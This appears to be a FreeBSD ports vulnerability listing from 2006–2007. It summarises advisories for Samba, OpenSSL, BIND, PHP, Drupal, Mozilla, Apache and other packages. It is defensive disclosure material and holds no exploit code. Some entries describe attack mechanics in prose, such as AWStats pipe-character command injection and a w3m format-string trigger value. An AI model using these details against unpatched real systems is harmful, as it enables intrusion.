| 2007-03-16 | Chris Travers reports: George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to enforce a password check under certain circumstances. The user can then create accounts or effect denial of service attacks. This is not related to any previous CVE. We have coordinated with the SQL-Ledger vendor and today both of us released security patches correcting the problem. SQL-Ledger users who can upgrade to 2.6.26 should do so, and LedgerSMB 1.1 or 1.0 users should upgrade to 1.1.9. Users who cannot upgrade should configure their web servers to use http authentication for the admin.pl script in the main root directory. more... | sql-ledger |
| 2007-03-16 | The Samba Team reports: Internally Samba's file server daemon, smbd, implements support for deferred file open calls in an attempt to serve client requests that would otherwise fail due to a share mode violation. When renaming a file under certain circumstances it is possible that the request is never removed from the deferred open queue. smbd will then become stuck is a loop trying to service the open request. This bug may allow an authenticated user to exhaust resources such as memory and CPU on the server by opening multiple CIFS sessions, each of which will normally spawn a new smbd process, and sending each connection into an infinite loop. more... | ja-samba samba |
| 2007-03-16 | The Samba Team reports: NOTE: This security advisory only impacts Samba servers that share AFS file systems to CIFS clients and which have been explicitly instructed in smb.conf to load the afsacl.so VFS module. The source defect results in the name of a file stored on disk being used as the format string in a call to snprintf(). This bug becomes exploitable only when a user is able to write to a share which utilizes Samba's afsacl.so library for setting Windows NT access control lists on files residing on an AFS file system. more... | ja-samba samba |
| 2007-03-16* | An undisclosed eRuby injection vulnerability had been discovered in tDiary. more... | ja-tdiary ja-tdiary-devel tdiary tdiary-devel |
| 2007-03-16* | tDiary was vulnerable to an unspecified Cross-Site Scripting vulnerability more... | ja-tdiary ja-tdiary-devel tdiary tdiary-devel |
| 2007-03-14* | Two problems have been found in KTorrent: KTorrent does not properly sanitize file names to filter out ".." components, so it's possible for an attacker to create a malicious torrent in order to overwrite arbitrary files within the filesystem. Messages with invalid chunk indexes aren't rejected. more... | ktorrent ktorrent-devel |
| 2007-03-12* | Multiple vulnerabilities have been found in PHP, including: buffer overflows, stack overflows, format string, and information disclosure vulnerabilities. The session extension contained safe_mode and open_basedir bypasses, but the FreeBSD Security Officer does not consider these real security vulnerabilities, since safe_mode and open_basedir are insecure by design and should not be relied upon. more... | mod_php mod_php4 mod_php4-twig mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php4-odbc php4-session php4-shmop php4-wddx php5 php5-cgi php5-cli php5-dtc php5-horde php5-imap php5-nms php5-odbc php5-session php5-shmop php5-sqlite php5-wddx |
| 2007-03-09 | "Moritz Jodeit reports: There's an exploitable buffer overflow in the current version of MPlayer (v1.0rc1) which can be exploited with a maliciously crafted video file. It's hidden in the function DMO_VideoDecoder() in the file loader/dmo/DMO_VideoDecoder.c. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-03-09 | Secunia reports: The vulnerability is caused due to an error within the "download wiki page as text" function, which can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation may require that the victim uses IE. more... | ja-trac trac |
| 2007-03-06* | TippingPoint and The Zero Day Initiative reports: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Tomcat JK Web Server Connector. Authentication is not required to exploit this vulnerability. The specific flaw exists in the URI handler for the mod_jk.so library, map_uri_to_worker(), defined in native/common/jk_uri_worker_map.c. When parsing a long URL request, the URI worker map routine performs an unsafe memory copy. This results in a stack overflow condition which can be leveraged to execute arbitrary code. more... | mod_jk mod_jk-ap2 |
| 2007-02-27 | Problem Description: A type * (ANY) query response containing multiple RRsets can trigger an assertion failure. Certain recursive queries can cause the nameserver to crash by using memory which has already been freed. Impact: A remote attacker sending a type * (ANY) query to an authoritative DNS server for a DNSSEC signed zone can cause the named(8) daemon to exit, resulting in a Denial of Service. A remote attacker sending recursive queries can cause the nameserver to crash, resulting in a Denial of Service. Workaround: There is no workaround available, but systems which are not authoritative servers for DNSSEC signed zones are not affected by the first issue; and systems which do not permit untrusted users to perform recursive DNS resolution are not affected by the second issue. Note that the default configuration for named(8) in FreeBSD allows local access only (which on many systems is equivalent to refusing access to untrusted users). more... | named |
| 2007-02-26 | Problem Description: If the end of an archive is reached while attempting to "skip" past a region of an archive, libarchive will enter an infinite loop wherein it repeatedly attempts (and fails) to read further data. Impact: An attacker able to cause a system to extract (via "tar -x" or another application which uses libarchive) or list the contents (via "tar -t" or another libarchive-using application) of an archive provided by the attacker can cause libarchive to enter an infinite loop and use all available CPU time. Workaround: No workaround is available. more... | libarchive |
| 2007-02-26 | Problem Description: Several problems have been found in OpenSSL: During the parsing of certain invalid ASN1 structures an error condition is mishandled, possibly resulting in an infinite loop. A buffer overflow exists in the SSL_get_shared_ciphers function. A NULL pointer may be dereferenced in the SSL version 2 client code. In addition, many applications using OpenSSL do not perform any validation of the lengths of public keys being used. Impact: Servers which parse ASN1 data from untrusted sources may be vulnerable to a denial of service attack. An attacker accessing a server which uses SSL version 2 may be able to execute arbitrary code with the privileges of that server. A malicious SSL server can cause clients connecting using SSL version 2 to crash. Applications which perform public key operations using untrusted keys may be vulnerable to a denial of service attack. Workaround: No workaround is available, but not all of the vulnerabilities mentioned affect all applications. more... | openssl |
| 2007-02-21 | A IBM Internet Security Systems Protection Advisory reports: Snort is vulnerable to a stack-based buffer overflow as a result of DCE/RPC reassembly. This vulnerability is in a dynamic-preprocessor enabled in the default configuration, and the configuration for this preprocessor allows for auto-recognition of SMB traffic to perform reassembly on. No checks are performed to see if the traffic is part of a valid TCP session, and multiple Write AndX requests can be chained in the same TCP segment. As a result, an attacker can exploit this overflow with a single TCP PDU sent across a network monitored by Snort or Sourcefire. Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should re-enable the DCE/RPC preprocessor. more... | snort |
| 2007-02-17 | iDefense reports: Remote exploitation of a stack based buffer overflow vulnerability in RARLabs Unrar may allow an attacker to execute arbitrary code with the privileges of the user opening the archive. Unrar is prone to a stack based buffer overflow when processing specially crafted password protected archives. If users are using the vulnerable command line based unrar, they still need to interact with the program in order to trigger the vulnerability. They must respond to the prompt asking for the password, after which the vulnerability will be triggered. They do not need to enter a correct password, but they must at least push the enter key. more... | rar unrar zh-unrar |
| 2007-01-17 | Secunia reports: Some vulnerabilities have been reported in Joomla!, where some have unknown impacts and one can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to an unspecified parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are caused due to unspecified errors in Joomla!. The vendor describes them as "several low level security issues". No further information is currently available. more... | joomla |
| 2007-01-15 | Secunia reports: A vulnerability in sircd can be exploited by a malicious person to compromise a vulnerable system. The vulnerability is caused by a boundary error in the code handling reverse DNS lookups, when a user connects to the service. If the FQDN (Fully Qualified Domain Name) returned is excessively long, the allocated buffer is overflowed making it possible to execute arbitrary code on the system with the privileges of the sircd daemon. more... | sircd |
| 2007-01-15 | Secunia reports: A vulnerability has been reported in sircd, which can be exploited by malicious users to gain operator privileges. The problem is that any user reportedly can set their usermode to operator. The vulnerability has been reported in versions 0.5.2 and 0.5.3. Other versions may also be affected. more... | sircd |
| 2007-01-12 | Secunia reports: rgod has discovered four vulnerabilities in Cacti, which can be exploited by malicious people to bypass certain security restrictions, manipulate data and compromise vulnerable systems. more... | cacti |
| 2007-01-08 | A potential buffer overflow was found in the code used to handle RealMedia RTSP streams. When checking for matching asm rules, the code stores the results in a fixed-size array, but no boundary checks are performed. This may lead to a buffer overflow if the user is tricked into connecting to a malicious server. Since the attacker can not write arbitrary data into the buffer, creating an exploit is very hard; but a DoS attack is easily made. A fix for this problem was committed to SVN on Sun Dec 31 13:27:53 2006 UTC as r21799. The fix involves three files: stream/realrtsp/asmrp.c, stream/realrtsp/asmrp.h and stream/realrtsp/real.c. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-01-06 | Matthias Andree reports: When delivering messages to a message delivery agent by means of the "mda" option, fetchmail can crash (by passing a NULL pointer to ferror() and fflush()) when refusing a message. SMTP and LMTP delivery modes aren't affected. more... | fetchmail |
| 2007-01-06 | Matthias Andree reports: Fetchmail has had several longstanding password disclosure vulnerabilities. sslcertck/sslfingerprint options should have implied "sslproto tls1" in order to enforce TLS negotiation, but did not. Even with "sslproto tls1" in the config, fetches would go ahead in plain text if STLS/STARTTLS wasn't available (not advertised, or advertised but rejected). POP3 fetches could completely ignore all TLS options whether available or not because it didn't reliably issue CAPA before checking for STLS support - but CAPA is a requisite for STLS. Whether or not CAPAbilities were probed, depended on the "auth" option. (Fetchmail only tried CAPA if the auth option was not set at all, was set to gssapi, kerberos, kerberos_v4, otp, or cram-md5.) POP3 could fall back to using plain text passwords, even if strong authentication had been configured. POP2 would not complain if strong authentication or TLS had been requested. more... | fetchmail |
| 2007-01-05 | iDefense reports: The vulnerability specifically exists due to Opera improperly processing a JPEG DHT marker. The DHT marker is used to define a Huffman Table which is used for decoding the image data. An invalid number of index bytes in the DHT marker will trigger a heap overflow with partially user controlled data. Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious image and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user. A flaw exists within Opera's Javascript SVG implementation. When processing a createSVGTransformFromMatrix request Opera does not properly validate the type of object passed to the function. Passing an incorrect object to this function can result in it using a pointer that is user controlled when it attempts to make the virtual function call. Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious JavaScript and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user. more... | linux-opera opera opera-devel |
| 2007-01-05 | The Drupal security team reports: A few arguments passed via URLs are not properly sanitized before display. When an attacker is able to entice an administrator to follow a specially crafted link, arbitrary HTML and script code can be injected and executed in the victim's session. Such an attack may lead to administrator access if certain conditions are met. The way page caching was implemented allows a denial of service attack. An attacker has to have the ability to post content on the site. He or she would then be able to poison the page cache, so that it returns cached 404 page not found errors for existing pages. If the page cache is not enabled, your site is not vulnerable. The vulnerability only affects sites running on top of MySQL. more... | drupal |
| 2007-01-03 | An anonymous person reports: w3m-0.5.1 crashes when using the -dump or -backend options to open a HTTPS URL with a SSL certificate where the CN contains "%n%n%n%n%n%n". more... | ja-w3m ja-w3m-img w3m w3m-img w3m-m17n w3m-m17n-img |
| 2006-12-27 | Plone.org reports: PlonePAS-using Plone releases (Plone 2.5 and Plone 2.5.1) has a potential vulnerability that allows a user to masquerade as a group. Please update your sites. more... | plone |
| 2006-12-27* | Secunia reports: A vulnerability has been reported in Zope, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an error in the use of the docutils module to parse and render "restructured" text. This can be exploited to disclose certain information via the "csv_table" reStructuredText directive. more... | zope |
| 2006-12-24* | Secunia reports: ShAnKaR has discovered a vulnerability in phpBB, which can be exploited by malicious users to compromise a vulnerable system. Input passed to the "avatar_path" parameter in admin/admin_board.php is not properly sanitised before being used as a configuration variable to store avatar images. This can be exploited to upload and execute arbitrary PHP code by changing "avatar_path" to a file with a trailing NULL byte. Successful exploitation requires privileges to the administration section. more... | phpbb zh-phpbb-tw |
| 2006-12-21 | The proftpd development team reports that several remote buffer overflows had been found in the proftpd server. more... | proftpd proftpd-mysql |
| 2006-12-19 | Problem Description For a recursive DNS server, a remote attacker sending enough recursive queries for the replies to arrive after all the interested clients have left the recursion queue will trigger an INSIST failure in the named(8) daemon. Also for a recursive DNS server, an assertion failure can occur when processing a query whose reply will contain more than one SIG(covered) RRset. For an authoritative DNS server serving a RFC 2535 DNSSEC zone which is queried for the SIG records where there are multiple SIG(covered) RRsets (e.g. a zone apex), named(8) will trigger an assertion failure when it tries to construct the response. Impact An attacker who can perform recursive lookups on a DNS server and is able to send a sufficiently large number of recursive queries, or is able to get the DNS server to return more than one SIG(covered) RRsets can stop the functionality of the DNS service. An attacker querying an authoritative DNS server serving a RFC 2535 DNSSEC zone may be able to crash the DNS server. Workaround A possible workaround is to only allow trusted clients to perform recursive queries. more... | bind9 |
| 2006-12-19 | Problem Description When verifying a PKCS#1 v1.5 signature, OpenSSL ignores any bytes which follow the cryptographic hash being signed. In a valid signature there will be no such bytes. Impact OpenSSL will incorrectly report some invalid signatures as valid. When an RSA public exponent of 3 is used, or more generally when a small public exponent is used with a relatively large modulus (e.g., a public exponent of 17 with a 4096-bit modulus), an attacker can construct a signature which OpenSSL will accept as a valid PKCS#1 v1.5 signature. Workaround No workaround is available. more... | openssl |
| 2006-12-18 | The Debian security Team reports: Several remote vulnerabilities have been discovered in SQL Ledger, a web based double-entry accounting program, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: Chris Travers discovered that the session management can be tricked into hijacking existing sessions. Chris Travers discovered that directory traversal vulnerabilities can be exploited to execute arbitrary Perl code. It was discovered that missing input sanitising allows execution of arbitrary Perl code. more... | sql-ledger |
| 2006-12-15* | Werner Koch reports: GnuPG uses data structures called filters to process OpenPGP messages. These filters are used in a similar way as a pipelines in the shell. For communication between these filters context structures are used. These are usually allocated on the stack and passed to the filter functions. At most places the OpenPGP data stream fed into these filters is closed before the context structure gets deallocated. While decrypting encrypted packets, this may not happen in all cases and the filter may use a void contest structure filled with garbage. An attacker may control this garbage. The filter context includes another context used by the low-level decryption to access the decryption algorithm. This is done using a function pointer. By carefully crafting an OpenPGP message, an attacker may control this function pointer and call an arbitrary function of the process. Obviously an exploit needs to prepared for a specific version, compiler, libc, etc to be successful - but it is definitely doable. Fixing this is obvious: We need to allocate the context on the heap and use a reference count to keep it valid as long as either the controlling code or the filter code needs it. We have checked all other usages of such a stack based filter contexts but fortunately found no other vulnerable places. This allows to release a relatively small patch. However, for reasons of code cleanness and easier audits we will soon start to change all these stack based filter contexts to heap based ones. more... | gnupg |
| 2006-12-15* | The official ruby site reports: Another vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS). A specific HTTP request for any web application using cgi.rb causes CPU consumption on the machine on which the web application is running. Many such requests result in a denial of service. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2006-12-15* | Secunia reports: Doubles has discovered a vulnerability in Unzoo, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an input validation error when unpacking archives. This can be exploited via a directory traversal attack to overwrite files outside the directory, where the files are extracted to, if a user is tricked into extracting a malicious archive using Unzoo. more... | unzoo |
| 2006-12-15* | Official ruby site reports: A vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS). The problem is triggered by sending the library an HTTP request that uses multipart MIME encoding and as an invalid boundary specifier that begins with "-" instead of "--". Once triggered it will exhaust all available memory resources effectively creating a DoS condition. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2006-12-14 | Secunia reports: D-Bus have a weakness, which can be exploited by malicious, local users to cause a DoS (Denial of Service). An error within the "match_rule_equal()" function can be exploited to disable the ability of other processes to receive messages by removing their matches from D-Bus. more... | dbus |
| 2006-12-14 | Secunia reports: A vulnerability has been discovered in Evince, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "get_next_text()" function in ps/ps.c. This can be exploited to cause a buffer overflow by e.g. tricking a user into opening a specially crafted PostScript file. more... | evince |
| 2006-12-13 | Secunia reports: Some vulnerabilities have been reported in wvWare, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise an application using the library. The vulnerabilities are caused due to integer overflows within the "wvGetLFO_records()" and "wvGetLFO_PLF()" functions. These can be exploited to cause heap-based buffer overflows by e.g. tricking a user to open a specially crafted Microsoft Word document with an application using the library. more... | wv |
| 2006-12-13 | Secunia reports: A vulnerability has been reported in wvWare wv2 Library, which potentially can be exploited by malicious people to compromise an application using the library. The vulnerability is caused due to an integer overflow error in "word_helper.h" when handling a Word document. This can be exploited to cause a buffer overflow and may allow arbitrary code execution via a specially crafted Word document. more... | wv2 |
| 2006-12-11 | The tnftpd port suffer from a remote stack overrun, which can lead to a root compromise. more... | tnftpd |
| 2006-12-09* | The libxine development team reports that several vulnerabilities had been found in the libxine library. The first vulnerability is caused by improper checking of the src/input/libreal/real.c "real_parse_sdp()" function. A remote attacker could exploit this by tricking an user to connect to a preparated server potentially causing a buffer overflow. Another buffer overflow had been found in the libmms library, potentially allowing a remote attacker to cause a denial of service vulnerability, and possible remote code execution through the following functions: send_command, string_utf16, get_data and get_media_packets. Other functions might be affected as well. more... | libxine |
| 2006-12-02 | SecurityFocus reports about libmusicbrainz: The libmusicbrainz library is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. An attacker can exploit these issues to execute arbitrary code within the context of the application or to cause a denial-of-service condition. more... | libmusicbrainz |
| 2006-12-02 | SecurityFocus reports about ImageMagick: ImageMagick is prone to a remote heap-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to execute arbitrary machine code in the context of applications that use the ImageMagick library. more... | ImageMagick |
| 2006-11-30 | Teemu Salmela reports: There is a tar record type, called GNUTYPE_NAMES (an obsolete GNU extension), that allows the creation of symbolic links pointing to arbitrary locations in the filesystem, which makes it possible to create/overwrite arbitrary files. more... | gtar |
| 2006-11-30 | iDefense Labs reports: Remote exploitation of a design error in Horde's Kronolith could allow an authenticated web mail user to execute arbitrary PHP code under the security context of the running web server. The vulnerability specifically exists due to a design error in the way it includes certain files. Specifically, the 'lib/FBView.php' file contains a function 'Kronolith_FreeBusy_View::factory' which will include local files that are supplied via the 'view' HTTP GET request parameter. more... | kronolith |
| 2006-11-27 | Werner Koch reports: When running GnuPG interactively, special crafted messages may be used to crash gpg or gpg2. Running gpg in batch mode, as done by all software using gpg as a backend (e.g. mailers), is not affected by this bug. Exploiting this overflow seems to be possible. gpg-agent, gpgsm, gpgv or other tools from the GnuPG suite are not affected. more... | gnupg |
| 2006-11-15* | FrSIRT reports: A vulnerability has been identified in ProFTPD, which could be exploited by attackers to cause a denial of service or execute arbitrary commands. This flaw is due to a buffer overflow error in the "main.c" file where the "cmd_buf_size" size of the buffer used to handle FTP commands sent by clients is not properly set to the size configured via the "CommandBufferSize" directive, which could be exploited by attackers to compromise a vulnerable server via a specially crafted FTP command. more... | proftpd proftpd-mysql |
| 2006-11-15* | OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character ("|") leads to an insecure call to Perl's open function and the rest of the input being executed in a shell. The code is run in the context of the process running the AWStats CGI. Arbitrary code can be executed by uploading a specially crafted configuration file if an attacker can put a file on the server with chosen file name and content (e.g. by using an FTP account on a shared hosting server). In this configuration file, the LogFile directive can be used to execute shell code following a pipe character. As above, an open call on unsanitized input is the source of this vulnerability. more... | awstats |
| 2006-11-11 | A Bugzilla Security Advisory reports: Sometimes the information put into the and tags in Bugzilla was not properly escaped, leading to a possible XSS vulnerability. Bugzilla administrators were allowed to put raw, unfiltered HTML into many fields in Bugzilla, leading to a possible XSS vulnerability. Now, the HTML allowed in those fields is limited. attachment.cgi could leak the names of private attachments The "deadline" field was visible in the XML format of a bug, even to users who were not a member of the "timetrackinggroup." A malicious user could pass a URL to an admin, and make the admin delete or change something that he had not intended to delete or change. It is possible to inject arbitrary HTML into the showdependencygraph.cgi page, allowing for a cross-site scripting attack. more... | bugzilla ja-bugzilla |
| 2006-11-11* | Some vulnerabilities have been reported in Bugzilla, which can be exploited by malicious users to conduct SQL injection attacks, and by malicious people to disclose sensitive information and conduct script insertion attacks. more... | bugzilla ja-bugzilla |
| 2006-11-08 | Secunia reports: Some vulnerabilities have been reported in imlib2, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. The vulnerabilities are caused due to unspecified errors within the processing of JPG, ARGB, PNG, LBM, PNM, TIFF, and TGA images. This may be exploited to execute arbitrary code by e.g. tricking a user into opening a specially crafted image file with an application using imlib2. more... | imlib2 |
| 2006-11-08* | Problem description A temporary file is created, used, deleted, and then re-created with the same name. This creates a window during which an attacker could replace the file with a link to another file. While cvsbug(1) is based on the send-pr(1) utility, this problem does not exist in the version of send-pr(1) distributed with FreeBSD. In FreeBSD 4.10 and 5.3, some additional problems exist concerning temporary file usage in both cvsbug(1) and send-pr(1). Impact A local attacker could cause data to be written to any file to which the user running cvsbug(1) (or send-pr(1) in FreeBSD 4.10 and 5.3) has write access. This may cause damage in itself (e.g., by destroying important system files or documents) or may be used to obtain elevated privileges. Workaround Do not use the cvsbug(1) utility on any system with untrusted users. Do not use the send-pr(1) utility on a FreeBSD 4.10 or 5.3 system with untrusted users. more... | cvs+ipv6 |
| 2006-11-02* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2006-64 Crashes with evidence of memory corruption (rv:1.8.0.7) MFSA 2006-63 JavaScript execution in mail via XBL MFSA 2006-62 Popup-blocker cross-site scripting (XSS) MFSA 2006-61 Frame spoofing using document.open() MFSA 2006-60 RSA Signature Forgery MFSA 2006-59 Concurrency-related vulnerability MFSA 2006-58 Auto-Update compromise through DNS and SSL spoofing MFSA 2006-57 JavaScript Regular Expression Heap Corruption more... | firefox linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2006-11-02* | A Mozilla Foundation Security Advisory reports of multiple issues. Several of which can be used to run arbitrary code with the privilege of the user running the program. MFSA 2006-56 chrome: scheme loading remote content MFSA 2006-55 Crashes with evidence of memory corruption (rv:1.8.0.5) MFSA 2006-54 XSS with XPCNativeWrapper(window).Function(...) MFSA 2006-53 UniversalBrowserRead privilege escalation MFSA 2006-52 PAC privilege escalation using Function.prototype.call MFSA 2006-51 Privilege escalation using named-functions and redefined "new Object()" MFSA 2006-50 JavaScript engine vulnerabilities MFSA 2006-49 Heap buffer overwrite on malformed VCard MFSA 2006-48 JavaScript new Function race condition MFSA 2006-47 Native DOM methods can be hijacked across domains MFSA 2006-46 Memory corruption with simultaneous events MFSA 2006-45 Javascript navigator Object Vulnerability MFSA 2006-44 Code execution through deleted frame reference more... | firefox linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2006-11-01* | The Apache Software Foundation and The Apache HTTP Server Project reports: An off-by-one flaw exists in the Rewrite module, mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since 2.2.0. Depending on the manner in which Apache HTTP Server was compiled, this software defect may result in a vulnerability which, in combination with certain types of Rewrite rules in the web server configuration files, could be triggered remotely. For vulnerable builds, the nature of the vulnerability can be denial of service (crashing of web server processes) or potentially allow arbitrary code execution. This issue has been rated as having important security impact by the Apache HTTP Server Security Team. This flaw does not affect a default installation of Apache HTTP Server. Users who do not use, or have not enabled, the Rewrite module mod_rewrite are not affected by this issue. This issue only affects installations using a Rewrite rule with the following characteristics: The RewriteRule allows the attacker to control the initial part of the rewritten URL (for example if the substitution URL starts with $1) The RewriteRule flags do NOT include any of the following flags: Forbidden (F), Gone (G), or NoEscape (NE). Please note that ability to exploit this issue is dependent on the stack layout for a particular compiled version of mod_rewrite. If the compiler used to compile Apache HTTP Server has added padding to the stack immediately after the buffer being overwritten, it will not be possible to exploit this issue, and Apache HTTP Server will continue operating normally. The Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs for the responsible reporting of this vulnerability. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2006-10-30* | Dmitri Lenev reports a privilege escalation in MySQL. MySQL evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote and local authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE. more... | mysql-server |
| 2006-10-29 | A vulnerability in the handling handling of combined UTF-8 characters in screen may allow an user-assisted attacker to crash screen or potentially allow code execution as the user running screen. To exploit this issue the user running scren must in some way interact with the attacker. more... | screen |
| 2006-10-29 | Michal Prokopiuk reports a privilege escalation in MySQL. The vulnerability causes MySQL, when run on case-sensitive filesystems, to allow remote and local authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions. more... | mysql-server |
| 2006-10-22 | Red Hat reports: An integer overflow flaw was found in the way Qt handled pixmap images. The KDE khtml library uses Qt in such a way that untrusted parameters could be passed to Qt, triggering the overflow. An attacker could for example create a malicious web page that when viewed by a victim in the Konqueror browser would cause Konqueror to crash or possibly execute arbitrary code with the privileges of the victim. more... | kdelibs kdelibs-nocups qt qt-copy |
| 2006-10-21 | The Serendipity Team reports: Serendipity failed to correctly sanitize user input on the media manager administration page. The content of GET variables were written into JavaScript strings. By using standard string evasion techniques it was possible to execute arbitrary JavaScript. Additionally Serendipity dynamically created a HTML form on the media manager administration page that contained all variables found in the URL as hidden fields. While the variable values were correctly escaped it was possible to break out by specifying strange variable names. more... | serendipity |
| 2006-10-21* | Rapid7 reports: The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely (via a remote X client or an X client which visits a malicious web page). A working proof-of-concept root exploit is included with this advisory. The NVIDIA drivers for Solaris and FreeBSD are also likely to be vulnerable. Disabling Render acceleration in the "nvidia" driver, via the "RenderAccel" X configuration option, can be used as a workaround for this issue. more... | nvidia-driver |
| 2006-10-20 | iDefense Labs reports: Remote exploitation of a heap overflow vulnerability within version 9 of Opera Software's Opera Web browser could allow an attacker to execute arbitrary code on the affected host. A flaw exists within Opera when parsing a tag that contains a URL. A heap buffer with a constant size of 256 bytes is allocated to store the URL, and the tag's URL is copied into this buffer without sufficient bounds checking of its length. more... | linux-opera opera opera-devel |
| 2006-10-20 | Adam Boileau of Security-Assessment.com reports: The Asterisk Skinny channel driver for Cisco SCCP phones (chan_skinny.so) incorrectly validates a length value in the packet header. An integer wrap-around leads to heap overwrite, and arbitrary remote code execution as root. more... | asterisk asterisk-bristuff |
| 2006-10-20* | The Plone Team reports: Plone 2.0.5, 2.1.2, and 2.5-beta1 does not restrict access to the: changeMemberPortrait deletePersonalPortrait testCurrentPassword methods, which allows remote attackers to modify portraits. more... | plone |
| 2006-10-18 | The Drupal Team reports: A malicious user may entice users to visit a specially crafted URL that may result in the redirection of Drupal form submission to a third-party site. A user visiting the user registration page via such a url, for example, will submit all data, such as his/her e-mail address, but also possible private profile data, to a third-party site. more... | drupal |
| 2006-10-18 | The Drupal Team reports: Visiting a specially crafted page, anywhere on the web, may allow that page to post forms to a Drupal site in the context of the visitor's session. To illustrate; suppose one has an active user 1 session, the most powerful administrator account for a site, to a Drupal site while visiting a website created by an attacker. This website will now be able to submit any form to the Drupal site with the privileges of user 1, either by enticing the user to submit a form or by automated means. An attacker can exploit this vulnerability by changing passwords, posting PHP code or creating new users, for example. The attack is only limited by the privileges of the session it executes in. more... | drupal |
| 2006-10-18 | The Drupal Team reports: A bug in input validation and lack of output validation allows HTML and script insertion on several pages. Drupal's XML parser passes unescaped data to watchdog under certain circumstances. A malicious user may execute an XSS attack via a specially crafted RSS feed. This vulnerability exists on systems that do not use PHP's mb_string extension (to check if mb_string is being used, navigate to admin/settings and look under "String handling"). Disabling the aggregator module provides an immediate workaround. The aggregator module, profile module, and forum module do not properly escape output of certain fields. Note: XSS attacks may lead to administrator access if certain conditions are met. more... | drupal |
| 2006-10-18 | The Horde team reports a vulnerability within Ingo, the filter management suite. The vulnerability is caused due to inadequete escaping, possibly allowing a local user to execute arbitrary shell commands via procmail. more... | ingo |
| 2006-10-17* | Stefan Esser reports: The PHP 5 branch of the PHP source code lacks the protection against possible integer overflows inside ecalloc() that is present in the PHP 4 branch and also for several years part of our Hardening-Patch and our new Suhosin-Patch. It was discovered that such an integer overflow can be triggered when user input is passed to the unserialize() function. Earlier vulnerabilities in PHP's unserialize() that were also discovered by one of our audits in December 2004 are unrelated to the newly discovered flaw, but they have shown, that the unserialize() function is exposed to user-input in many popular PHP applications. Examples for applications that use the content of COOKIE variables with unserialize() are phpBB and Serendipity. The successful exploitation of this integer overflow will result in arbitrary code execution. more... | mod_php5 php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-10-17* | The Apple Security Team reports that there are multiple vulnerabilities within QuickTime (one of the plugins for win32-codecs). A remote attacker capable of creating a malicious SGI image, FlashPix, FLC movie, or a QuickTime movie can possibly lead to execution of arbitrary code or cause a Denial of Service (application crash). Users who have QuickTime (/win32-codecs) as a browser plugin may be vulnerable to remote code execution by visiting a website containing a malicious SGI image, FlashPix, FLC movie or a QuickTime movie. more... | win32-codecs |
